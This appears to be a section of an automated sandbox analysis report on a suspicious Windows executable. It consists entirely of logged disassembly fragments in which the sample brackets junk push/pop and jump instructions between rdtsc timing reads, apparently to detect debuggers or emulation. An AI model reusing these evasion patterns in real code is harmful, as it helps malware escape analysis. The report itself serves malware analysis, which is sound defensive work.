Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11872C3 second address: 11872C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11872C7 second address: 11872D1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC728ECBE06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11872D1 second address: 11872EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FC7292A9B10h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11872EB second address: 11872F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11875AB second address: 11875CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FC7292A9B18h 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11875CC second address: 11875E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE11h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007FC728ECBE06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 118BD76 second address: 118BD9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC7292A9B06h 0x0000000a pop edx 0x0000000b jbe 00007FC7292A9B12h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FC7292A9B06h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 118BD9B second address: 118BDB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FC728ECBE06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jo 00007FC728ECBE0Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 118BDB1 second address: 118BDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 118F887 second address: 118F88B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 118FE55 second address: 118FE75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B16h 0x00000007 jbe 00007FC7292A9B06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1190152 second address: 119015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1194C80 second address: 1194C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1194E39 second address: 1194E59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE15h 0x00000007 pushad 0x00000008 jnl 00007FC728ECBE06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1194E59 second address: 1194E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1194FDB second address: 1194FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1195161 second address: 1195186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7292A9B10h 0x00000009 popad 0x0000000a pushad 0x0000000b je 00007FC7292A9B06h 0x00000011 jl 00007FC7292A9B06h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142B10 second address: 1142B67 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC728ECBE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FC728ECBE1Fh 0x00000010 jmp 00007FC728ECBE19h 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 movsx edx, ax 0x0000001c mov ebx, dword ptr [ebp+12493C5Ah] 0x00000022 mov cx, si 0x00000025 add eax, ebx 0x00000027 add edi, 4C174283h 0x0000002d nop 0x0000002e push ecx 0x0000002f jo 00007FC728ECBE0Ch 0x00000035 pop ecx 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push esi 0x0000003c pop esi 0x0000003d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142B67 second address: 1142B83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142B83 second address: 1142BB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jl 00007FC728ECBE0Ch 0x00000010 mov dword ptr [ebp+122D2EDAh], eax 0x00000016 push 00000004h 0x00000018 clc 0x00000019 mov dword ptr [ebp+122D38A8h], ebx 0x0000001f nop 0x00000020 pushad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1142BB1 second address: 1142BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7292A9B13h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11952FA second address: 11952FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1195E68 second address: 1195E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1195E6C second address: 1195E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC728ECBE11h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 119C7C7 second address: 119C7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 119CDE1 second address: 119CDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 119CDE6 second address: 119CDF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FC7292A9B06h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 119CDF2 second address: 119CE04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 119D68C second address: 119D6B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7292A9B0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC7292A9B14h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 119D6B5 second address: 119D6BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 119DEC1 second address: 119DEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edi 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FC7292A9B0Ah 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 ja 00007FC7292A9B08h 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 119E170 second address: 119E184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC728ECBE0Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11A2E69 second address: 11A2E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11A636A second address: 11A6373 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11A6373 second address: 11A637B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11A663F second address: 11A666F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC728ECBE12h 0x00000008 jmp 00007FC728ECBE0Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FC728ECBE14h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11A6A88 second address: 11A6A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7292A9B13h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11B04A0 second address: 11B04B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FC728ECBE08h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11B04B3 second address: 11B04BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC7292A9B06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11B04BD second address: 11B04CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11B04CC second address: 11B04D1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11B032F second address: 11B033E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC728ECBE06h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11B033E second address: 11B034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7292A9B0Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11B5D62 second address: 11B5D72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FC728ECBE06h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11B5D72 second address: 11B5D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11B9217 second address: 11B923E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FC728ECBE10h 0x0000000c jmp 00007FC728ECBE0Ah 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC728ECBE0Bh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11B923E second address: 11B9244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11B9244 second address: 11B9250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC728ECBE06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11B9250 second address: 11B9255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11C3113 second address: 11C3121 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jno 00007FC728ECBE06h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11C4CC8 second address: 11C4CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC7292A9B0Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11C4CDF second address: 11C4CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11C4E53 second address: 11C4E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11C4E57 second address: 11C4E74 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FC728ECBE14h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11C9AEE second address: 11C9AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11C9AF3 second address: 11C9B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC728ECBE06h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11C9C79 second address: 11C9C7F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11C9C7F second address: 11C9CB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007FC728ECBE06h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push esi 0x00000011 jmp 00007FC728ECBE0Ch 0x00000016 pop esi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC728ECBE16h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11D1C5F second address: 11D1C74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FC7292A9B06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FC7292A9B14h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11D849C second address: 11D84A8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC728ECBE06h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11DE147 second address: 11DE14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11DE14B second address: 11DE155 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC728ECBE06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11E3520 second address: 11E3527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11E3527 second address: 11E353E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC728ECBE12h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11E3987 second address: 11E398C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11E3DBA second address: 11E3DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11E3DBE second address: 11E3DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11E3F34 second address: 11E3F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC728ECBE0Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11E3F48 second address: 11E3F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 11E7746 second address: 11E7751 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007FC728ECBE06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 122B0AB second address: 122B0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 js 00007FC7292A9B0Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1229449 second address: 122944F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 123C909 second address: 123C90D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 123C90D second address: 123C913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1308CBD second address: 1308CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1308CC8 second address: 1308CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1308F3A second address: 1308F48 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC7292A9B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1309097 second address: 13090C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC728ECBE10h 0x00000008 jmp 00007FC728ECBE12h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130952B second address: 1309531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130990A second address: 1309910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1309910 second address: 1309915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1309915 second address: 130991F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC728ECBE0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 1309A7B second address: 1309A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC7292A9B06h 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FC7292A9B11h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130B46E second address: 130B477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130B477 second address: 130B47D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130B47D second address: 130B483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130B483 second address: 130B4C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC7292A9B06h 0x00000009 jmp 00007FC7292A9B13h 0x0000000e jp 00007FC7292A9B06h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007FC7292A9B08h 0x0000001f jmp 00007FC7292A9B0Fh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130E07C second address: 130E0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 push ebx 0x0000000a jmp 00007FC728ECBE16h 0x0000000f pop ebx 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC728ECBE11h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130E2EC second address: 130E2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130E2F7 second address: 130E2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\qZA8AyGxiA.exeRDTSC instruction interceptor: First address: 130E2FF second address: 130E33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7292A9B17h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c jnp 00007FC7292A9B0Ch 0x00000012 push dword ptr [ebp+122D24A3h] 0x00000018 mov dx, cx 0x0000001b push 7E2A931Ah 0x00000020 push ebx 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
